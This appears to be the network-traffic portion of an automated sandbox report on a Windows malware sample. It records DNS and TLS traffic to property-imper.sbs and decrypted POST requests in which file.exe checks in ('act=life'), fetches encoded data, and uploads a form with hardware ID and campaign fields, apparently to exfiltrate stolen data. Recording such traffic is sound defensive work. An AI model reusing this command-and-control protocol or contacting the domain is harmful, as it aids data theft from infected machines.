                                                                                        Nov 23, 2024 13:57:44.366707087 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:44.375222921 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:44.375238895 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:45.639657021 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:45.639771938 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:45.641479015 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:45.641489983 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:45.641716957 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:45.645426989 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:45.645545006 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:45.645551920 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:46.236555099 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:46.236638069 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:46.236685991 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:46.236825943 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:46.236845016 CET44349720104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:46.791913033 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:46.791958094 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:46.792058945 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:46.792361975 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:46.792373896 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.020148993 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.020216942 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.021583080 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.021595001 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.021832943 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.028642893 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.029478073 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.029514074 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.029664040 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.029694080 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.029787064 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.029819965 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.029905081 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.029928923 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.030085087 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.030109882 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.030846119 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.030878067 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.075335026 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.075484991 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.075524092 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.119374990 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.119558096 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.119607925 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.119621038 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.163331032 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.163499117 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.163539886 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.207360029 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.207453966 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.251333952 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.270242929 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.270517111 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:48.270528078 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:48.398396015 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:51.654660940 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:51.654912949 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:51.654962063 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:51.655153036 CET49729443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:51.655163050 CET44349729104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:51.666968107 CET49745443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:51.666996956 CET44349745104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:51.667068958 CET49745443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:51.667378902 CET49745443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:51.667393923 CET44349745104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:52.147861958 CET49745443192.168.2.6104.21.33.116

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 23, 2024 13:57:32.169172049 CET5302053192.168.2.61.1.1.1
                                                                                        Nov 23, 2024 13:57:32.634843111 CET53530201.1.1.1192.168.2.6

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 23, 2024 13:57:32.169172049 CET192.168.2.61.1.1.10xcf63Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 23, 2024 13:57:32.634843111 CET1.1.1.1192.168.2.60xcf63No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                        Nov 23, 2024 13:57:32.634843111 CET1.1.1.1192.168.2.60xcf63No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • property-imper.sbs

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.649707104.21.33.1164434392C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 12:57:34 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: property-imper.sbs
                                                                                        2024-11-23 12:57:34 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-11-23 12:57:34 UTC1021INHTTP/1.1 200 OK
                                                                                        Date: Sat, 23 Nov 2024 12:57:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=8romjifedhob5ekuer8tofjptr; expires=Wed, 19-Mar-2025 06:44:13 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mfhuej3HLAcGDXoBYCsJ8n4DWEBIgABrboXWou2Xl3xpcQVrEq%2B6k0%2FngoAzR2gauxDHLtYLZ%2Bj7EiyqZSZwm6Aod85sLv%2Fr5sZ8tKayE%2BfN1%2FAMFZs0l6l%2Bh29FHFgkVhxKSKM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e71536528507274-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1810&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1536842&cwnd=181&unsent_bytes=0&cid=26a2e6d64ff41ee4&ts=690&x=0"
                                                                                        2024-11-23 12:57:34 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-11-23 12:57:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.649708104.21.33.1164434392C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 12:57:35 UTC266OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 53
                                                                                        Host: property-imper.sbs
                                                                                        2024-11-23 12:57:35 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                        2024-11-23 12:57:36 UTC1015INHTTP/1.1 200 OK
                                                                                        Date: Sat, 23 Nov 2024 12:57:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=d7elldc8eka4d40ott6sjud2l7; expires=Wed, 19-Mar-2025 06:44:15 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CokwVoazkNINOiYk8Tp%2F1PA3KBByJ4ReiQL3CJgWvMyXXTpDMpKITkGrnT6LDVtJTG9QIHQAiOp%2FRQWTT%2Fg0WxVhJDNOXSle7dCvidClm3B4X20SIlTAc2KbhL3%2F2gmeP1EXZeo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e715371aa910f39-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1458&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1879021&cwnd=249&unsent_bytes=0&cid=fc11f5b363ae9a96&ts=697&x=0"
                                                                                        2024-11-23 12:57:36 UTC354INData Raw: 31 64 38 33 0d 0a 4a 38 71 6f 71 4e 47 38 65 34 68 33 6a 6b 54 61 66 62 57 75 65 31 75 50 43 69 72 69 7a 41 73 4a 74 59 6c 70 43 6b 67 55 57 67 4a 63 36 4e 36 4b 36 34 68 58 71 67 54 72 5a 75 41 4a 78 39 73 65 64 36 31 72 54 73 44 32 62 57 6a 5a 2b 67 77 6d 61 6d 49 33 49 42 32 73 79 63 53 69 32 56 65 71 45 76 5a 6d 34 43 62 4f 6a 42 34 31 72 54 41 49 68 36 5a 70 61 4e 6e 72 43 47 45 6e 5a 44 5a 68 54 36 62 50 77 4c 54 66 48 2b 6b 62 34 79 47 2f 47 4e 54 45 46 54 4c 69 59 6b 66 41 34 43 6c 73 7a 36 74 54 4b 41 56 78 4c 6d 4e 71 71 39 76 44 38 38 46 58 38 31 58 72 4b 76 68 48 6c 38 38 65 4f 65 4e 73 54 6f 6d 6b 59 32 48 52 36 67 31 67 4f 48 30 38 61 6b 2b 6f 7a 4d 47 2b 31 67 76 6b 45 65 51 71 75 52 4c 55 6a 46 64 35 36 6e 41 49 32 4f 34 36 57 64 54 36 47
                                                                                        Data Ascii: 1d83J8qoqNG8e4h3jkTafbWue1uPCirizAsJtYlpCkgUWgJc6N6K64hXqgTrZuAJx9sed61rTsD2bWjZ+gwmamI3IB2sycSi2VeqEvZm4CbOjB41rTAIh6ZpaNnrCGEnZDZhT6bPwLTfH+kb4yG/GNTEFTLiYkfA4Clsz6tTKAVxLmNqq9vD88FX81XrKvhHl88eOeNsTomkY2HR6g1gOH08ak+ozMG+1gvkEeQquRLUjFd56nAI2O46WdT6G
                                                                                        2024-11-23 12:57:36 UTC1369INData Raw: 30 78 6e 34 48 65 63 74 76 51 33 63 78 52 51 30 37 57 56 43 6a 36 31 70 62 4e 33 68 42 47 49 75 65 7a 56 6d 52 61 69 4b 68 50 50 5a 41 61 70 4e 72 41 57 39 44 39 44 41 44 33 76 58 4b 46 66 4f 74 79 6c 73 32 36 74 54 4b 43 4a 7a 4f 32 4e 4f 70 38 6e 43 75 4d 77 5a 2b 42 50 68 49 36 6f 5a 30 73 49 54 4f 76 39 69 52 6f 61 74 59 47 44 65 37 67 78 73 61 6a 68 34 5a 31 33 6f 6b 6f 71 53 30 78 4c 6d 48 2f 73 6d 2b 41 43 5a 31 56 6b 2b 34 53 67 51 77 4b 70 6f 62 39 62 76 42 57 59 75 65 6a 35 75 53 4b 66 4d 77 4c 50 5a 45 2b 49 64 37 53 75 7a 45 4e 66 4a 46 44 33 72 5a 45 6d 46 37 69 63 72 30 50 4e 4c 4d 47 70 59 50 32 4e 58 36 76 2f 4a 76 64 41 65 2f 46 58 7a 61 4b 46 66 30 4d 42 5a 59 61 31 6d 54 59 2b 38 61 48 6e 53 35 52 6c 6b 4c 33 41 31 59 30 75 6f 7a 38 32
                                                                                        Data Ascii: 0xn4HectvQ3cxRQ07WVCj61pbN3hBGIuezVmRaiKhPPZAapNrAW9D9DAD3vXKFfOtyls26tTKCJzO2NOp8nCuMwZ+BPhI6oZ0sITOv9iRoatYGDe7gxsajh4Z13okoqS0xLmH/sm+ACZ1Vk+4SgQwKpob9bvBWYuej5uSKfMwLPZE+Id7SuzENfJFD3rZEmF7icr0PNLMGpYP2NX6v/JvdAe/FXzaKFf0MBZYa1mTY+8aHnS5RlkL3A1Y0uoz82
                                                                                        2024-11-23 12:57:36 UTC1369INData Raw: 46 58 7a 61 4b 46 66 30 4d 42 5a 59 61 31 6b 51 59 43 6c 59 32 2f 58 37 41 5a 74 4b 58 45 37 62 55 4b 69 78 4d 32 33 30 68 44 6e 45 2b 77 68 76 42 72 46 79 52 41 31 34 53 67 47 77 4b 6c 78 4b 34 2b 72 4a 47 38 38 64 52 64 6a 56 4b 47 4b 31 66 33 48 57 65 30 5a 72 48 37 34 47 4e 4c 45 45 6a 2f 6c 61 46 71 46 6f 47 4a 71 33 65 30 4b 5a 53 5a 77 4f 47 46 46 72 73 62 4b 74 4e 6b 4c 2b 42 44 71 4e 4c 4a 66 6d 59 77 65 49 61 30 77 43 4c 61 2b 66 6e 72 42 71 54 35 72 4a 48 67 2f 64 67 57 33 68 4e 50 7a 32 52 57 71 54 61 77 74 75 42 50 51 78 42 38 39 35 57 64 48 69 62 78 6f 5a 39 6e 35 44 47 67 6a 65 44 64 73 54 4b 58 4e 78 37 6a 55 46 4f 34 53 37 57 62 32 58 39 44 55 57 57 47 74 58 6c 69 4e 6f 6b 64 67 32 2b 4a 4c 64 32 52 76 65 47 64 4a 36 4a 4b 4b 74 39 49 52
                                                                                        Data Ascii: FXzaKFf0MBZYa1kQYClY2/X7AZtKXE7bUKixM230hDnE+whvBrFyRA14SgGwKlxK4+rJG88dRdjVKGK1f3HWe0ZrH74GNLEEj/laFqFoGJq3e0KZSZwOGFFrsbKtNkL+BDqNLJfmYweIa0wCLa+fnrBqT5rJHg/dgW3hNPz2RWqTawtuBPQxB895WdHibxoZ9n5DGgjeDdsTKXNx7jUFO4S7Wb2X9DUWWGtXliNokdg2+JLd2RveGdJ6JKKt9IR
                                                                                        2024-11-23 12:57:36 UTC1369INData Raw: 4f 39 47 39 44 49 48 7a 61 74 4a 67 69 48 74 69 6b 7a 6c 38 51 73 58 57 68 58 41 69 42 61 35 74 4f 4b 74 4e 4a 5a 73 6c 58 67 4a 62 51 58 32 4d 6f 51 4e 65 64 68 51 34 79 6c 62 57 66 65 37 67 31 70 4c 33 4d 35 5a 45 6d 69 7a 4d 6d 77 30 52 62 6c 48 61 78 6f 2b 42 6a 50 6a 45 46 35 79 48 39 44 6a 71 67 70 64 4a 6e 79 53 32 38 6d 4e 6d 41 67 53 61 48 4d 7a 4c 62 53 47 4f 77 64 36 53 36 38 48 74 48 4b 47 6a 62 70 62 55 6d 50 71 6d 56 6c 33 65 6f 4b 5a 43 46 35 4d 32 55 46 35 6f 72 4e 71 35 35 42 71 69 54 76 4d 4b 38 50 32 34 77 47 64 2f 51 6f 54 34 7a 75 4d 53 76 57 2b 51 46 69 4a 48 4d 33 5a 55 61 6e 7a 63 65 31 30 68 50 6a 48 65 6f 70 73 51 33 55 77 42 63 2b 34 32 52 47 6a 61 52 71 5a 70 65 6c 53 32 38 79 4e 6d 41 67 61 61 2f 48 35 4c 6a 53 48 71 6f 4b 6f
                                                                                        Data Ascii: O9G9DIHzatJgiHtikzl8QsXWhXAiBa5tOKtNJZslXgJbQX2MoQNedhQ4ylbWfe7g1pL3M5ZEmizMmw0RblHaxo+BjPjEF5yH9DjqgpdJnyS28mNmAgSaHMzLbSGOwd6S68HtHKGjbpbUmPqmVl3eoKZCF5M2UF5orNq55BqiTvMK8P24wGd/QoT4zuMSvW+QFiJHM3ZUanzce10hPjHeopsQ3UwBc+42RGjaRqZpelS28yNmAgaa/H5LjSHqoKo
                                                                                        2024-11-23 12:57:36 UTC1369INData Raw: 58 79 77 46 35 74 53 68 2b 68 37 35 35 61 4a 58 61 48 57 73 38 66 54 56 73 42 62 65 45 30 2f 50 5a 46 61 70 4e 72 43 43 33 46 74 54 44 47 44 44 68 5a 55 32 4a 71 32 68 74 30 2b 45 42 61 43 78 77 4f 57 56 50 71 38 76 41 75 74 6b 52 37 52 62 2b 5a 76 5a 66 30 4e 52 5a 59 61 31 42 54 35 4b 67 65 53 76 49 70 52 49 6f 4c 58 70 34 4f 41 57 73 77 4d 57 33 32 52 58 73 45 4f 6f 72 75 52 44 57 7a 42 59 39 35 6d 46 4f 67 61 4e 73 5a 74 50 35 41 57 4d 6c 65 6a 46 73 53 4f 69 45 69 72 54 47 57 62 4a 56 33 53 75 32 45 64 44 61 57 53 61 6a 63 51 69 48 6f 69 6b 7a 6c 2b 6f 48 5a 79 6c 35 4f 32 4e 45 6f 74 6a 59 76 39 63 52 37 78 6e 6e 4b 4c 34 4e 30 63 4d 51 4f 75 35 68 54 34 69 69 59 32 6a 51 71 30 55 6f 4c 57 35 34 4f 41 57 4c 33 64 71 2b 6e 67 61 6b 44 4b 77 68 74 46
                                                                                        Data Ascii: XywF5tSh+h755aJXaHWs8fTVsBbeE0/PZFapNrCC3FtTDGDDhZU2Jq2ht0+EBaCxwOWVPq8vAutkR7Rb+ZvZf0NRZYa1BT5KgeSvIpRIoLXp4OAWswMW32RXsEOoruRDWzBY95mFOgaNsZtP5AWMlejFsSOiEirTGWbJV3Su2EdDaWSajcQiHoikzl+oHZyl5O2NEotjYv9cR7xnnKL4N0cMQOu5hT4iiY2jQq0UoLW54OAWL3dq+ngakDKwhtF
                                                                                        2024-11-23 12:57:36 UTC1369INData Raw: 4b 2b 68 75 52 34 2b 6e 59 47 2f 66 36 41 74 73 4c 6e 45 39 59 30 6d 6a 7a 63 6d 38 32 68 44 6b 48 4f 4e 6d 39 6c 2f 51 31 46 6c 68 72 55 6c 54 67 36 4a 6b 4b 38 69 6c 45 69 67 74 65 6e 67 34 42 61 54 45 7a 37 50 55 48 2b 34 51 36 69 79 39 48 39 7a 50 46 6a 33 72 62 45 65 41 70 57 42 71 30 65 34 42 59 79 78 37 4f 32 5a 44 36 49 53 4b 74 4d 5a 5a 73 6c 58 4d 50 62 55 54 30 49 77 47 64 2f 51 6f 54 34 7a 75 4d 53 76 63 35 77 39 76 4b 6e 73 37 61 45 43 73 77 4d 2b 7a 31 67 76 69 46 65 73 30 71 68 2f 65 79 52 55 36 37 57 78 4f 69 61 68 71 62 35 65 6c 53 32 38 79 4e 6d 41 67 61 4b 54 4e 34 37 54 46 57 66 56 62 39 57 61 2f 45 35 65 55 57 54 6a 6d 59 6b 65 4e 72 57 39 6f 33 4f 34 42 61 53 31 2b 4e 58 4a 47 70 38 58 4f 73 39 45 66 37 42 54 6a 49 4c 38 57 31 73 51
                                                                                        Data Ascii: K+huR4+nYG/f6AtsLnE9Y0mjzcm82hDkHONm9l/Q1FlhrUlTg6JkK8ilEigteng4BaTEz7PUH+4Q6iy9H9zPFj3rbEeApWBq0e4BYyx7O2ZD6ISKtMZZslXMPbUT0IwGd/QoT4zuMSvc5w9vKns7aECswM+z1gviFes0qh/eyRU67WxOiahqb5elS28yNmAgaKTN47TFWfVb9Wa/E5eUWTjmYkeNrW9o3O4BaS1+NXJGp8XOs9Ef7BTjIL8W1sQ
                                                                                        2024-11-23 12:57:36 UTC364INData Raw: 6e 61 6e 75 47 4e 73 78 2b 77 63 5a 32 6f 34 65 47 38 46 38 50 4f 4b 75 74 6b 43 2b 77 50 68 4e 72 39 66 36 49 4a 5a 49 61 30 77 43 4c 57 74 5a 32 58 51 2f 52 6f 6c 44 57 41 79 5a 31 57 76 33 63 58 7a 6b 46 6e 73 56 62 52 31 39 6c 2f 54 33 56 6c 68 76 54 6f 54 31 66 30 2b 4f 34 58 30 52 58 46 71 59 48 67 34 46 2b 61 4b 32 50 4f 47 57 61 30 57 2f 6a 53 2b 48 4d 48 50 58 67 66 54 54 31 4b 4e 71 48 35 36 36 64 55 4d 63 69 64 77 4c 33 45 4a 76 63 6e 45 76 64 6b 50 71 6c 75 73 4b 66 68 48 37 6f 78 52 65 64 49 6d 43 4a 6a 75 4d 53 76 69 36 41 56 6d 4c 57 41 70 4c 57 4b 79 78 38 79 6b 7a 31 6d 6b 56 65 70 6d 34 45 2b 5a 6a 42 30 6f 72 54 41 59 30 76 55 38 4f 49 43 37 57 58 64 6b 62 33 68 32 42 66 43 59 68 50 50 4d 57 62 4a 56 71 79 57 71 44 64 48 50 44 7a 71 71
                                                                                        Data Ascii: nanuGNsx+wcZ2o4eG8F8POKutkC+wPhNr9f6IJZIa0wCLWtZ2XQ/RolDWAyZ1Wv3cXzkFnsVbR19l/T3VlhvToT1f0+O4X0RXFqYHg4F+aK2POGWa0W/jS+HMHPXgfTT1KNqH566dUMcidwL3EJvcnEvdkPqlusKfhH7oxRedImCJjuMSvi6AVmLWApLWKyx8ykz1mkVepm4E+ZjB0orTAY0vU8OIC7WXdkb3h2BfCYhPPMWbJVqyWqDdHPDzqq
                                                                                        2024-11-23 12:57:36 UTC1369INData Raw: 32 36 65 39 0d 0a 59 69 75 75 65 58 75 6b 48 2f 69 43 37 43 64 53 4c 4a 77 66 75 66 6b 57 50 70 57 68 56 36 63 55 47 61 53 6c 34 65 6c 46 54 70 64 72 4a 74 74 6b 6e 31 42 76 72 4d 72 38 52 30 63 78 5a 64 36 31 6e 43 4e 69 58 4b 53 4f 58 31 45 55 6f 4d 6a 5a 67 49 48 43 72 78 4d 53 30 79 41 69 6e 4e 76 6f 72 74 78 54 57 6a 46 64 35 36 79 67 51 30 4f 41 70 62 38 61 72 55 7a 68 34 4c 57 30 7a 45 76 69 59 31 66 33 48 57 66 78 56 74 48 54 32 58 38 57 4d 51 58 6d 71 5a 6b 57 42 72 57 64 6f 78 66 6b 4e 61 7a 78 31 66 31 35 37 69 63 66 42 76 39 4d 57 34 53 76 53 42 37 55 55 32 38 45 57 4d 74 4e 57 58 59 4f 67 5a 32 7a 42 2b 6b 73 6d 61 6e 6c 34 4f 48 7a 6f 67 6f 71 4d 6b 46 6e 79 56 62 52 6d 6a 52 7a 5a 77 68 34 76 2f 43 56 70 6a 61 56 6c 5a 74 6a 67 53 79 5a 71
                                                                                        Data Ascii: 26e9YiuueXukH/iC7CdSLJwfufkWPpWhV6cUGaSl4elFTpdrJttkn1BvrMr8R0cxZd61nCNiXKSOX1EUoMjZgIHCrxMS0yAinNvortxTWjFd56ygQ0OApb8arUzh4LW0zEviY1f3HWfxVtHT2X8WMQXmqZkWBrWdoxfkNazx1f157icfBv9MW4SvSB7UU28EWMtNWXYOgZ2zB+ksmanl4OHzogoqMkFnyVbRmjRzZwh4v/CVpjaVlZtjgSyZq
                                                                                        2024-11-23 12:57:36 UTC1369INData Raw: 4f 72 6a 66 53 4e 2b 77 37 70 42 65 6f 6c 68 69 48 38 77 42 38 2b 39 32 39 4f 70 6f 34 70 4a 5a 66 6b 53 7a 41 54 4e 6e 41 67 65 75 61 4b 30 76 4f 47 57 64 38 57 34 69 69 2f 43 63 61 42 50 43 37 75 65 45 36 44 37 69 63 72 30 61 74 54 4f 47 51 32 50 48 45 46 38 4a 71 59 36 49 74 4b 76 55 57 2b 4f 66 59 47 6c 39 70 5a 59 62 38 6d 43 4a 4c 75 4d 53 75 51 36 42 6c 36 4c 48 55 75 59 77 4b 57 39 4f 79 77 7a 78 50 4c 47 50 77 68 68 69 48 43 7a 78 63 33 36 6e 35 5a 77 4f 41 70 5a 4a 65 7a 4d 69 68 69 4f 6a 35 6a 55 2b 6a 31 68 50 50 47 57 62 4a 56 32 53 57 32 45 64 44 61 43 48 54 4c 61 31 6d 4b 6a 32 52 37 30 4b 74 46 4b 43 77 32 59 44 4d 4c 36 4d 37 62 38 34 5a 4a 75 45 36 35 64 65 39 50 68 64 4e 58 49 4b 31 2b 43 4e 6a 38 4a 79 76 46 71 31 4d 6f 62 58 55 71 63
                                                                                        Data Ascii: OrjfSN+w7pBeolhiH8wB8+929Opo4pJZfkSzATNnAgeuaK0vOGWd8W4ii/CcaBPC7ueE6D7icr0atTOGQ2PHEF8JqY6ItKvUW+OfYGl9pZYb8mCJLuMSuQ6Bl6LHUuYwKW9OywzxPLGPwhhiHCzxc36n5ZwOApZJezMihiOj5jU+j1hPPGWbJV2SW2EdDaCHTLa1mKj2R70KtFKCw2YDML6M7b84ZJuE65de9PhdNXIK1+CNj8JyvFq1MobXUqc


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.649710104.21.33.1164434392C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 12:57:38 UTC277OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=8YZHJO8XC3M
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 12823
                                                                                        Host: property-imper.sbs
                                                                                        2024-11-23 12:57:38 UTC12823OUTData Raw: 2d 2d 38 59 5a 48 4a 4f 38 58 43 33 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 42 37 37 31 39 45 43 45 35 36 37 32 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 38 59 5a 48 4a 4f 38 58 43 33 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 59 5a 48 4a 4f 38 58 43 33 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 59 5a 48 4a 4f 38 58 43 33 4d
